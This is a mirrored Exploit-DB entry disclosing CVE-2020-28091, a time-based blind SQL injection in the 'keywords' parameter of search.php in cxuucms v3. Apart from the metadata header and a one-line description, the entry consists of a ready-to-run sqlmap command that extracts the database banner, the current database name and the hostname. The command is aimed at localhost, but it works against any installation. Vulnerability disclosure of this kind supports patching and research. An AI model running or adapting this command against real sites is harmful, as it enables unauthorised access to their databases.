xuucms 3 – ‘keywords’ SQL Injection

• Exploit Database
• 106 阅读

• 作者： icekam
  日期： 2020-11-19
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49073/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  # Exploit Title: xuucms 3 - 'keywords' SQL Injection # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.cxuu.top/ # Software Link: https://github.com/cbkhwx/cxuucmsv3 # Version: cxuucms - v3 # CVE : CVE-2020-28091   SQL injection exists in search.php. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1   Use SQLMAP authentication: sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b--current-db --hostname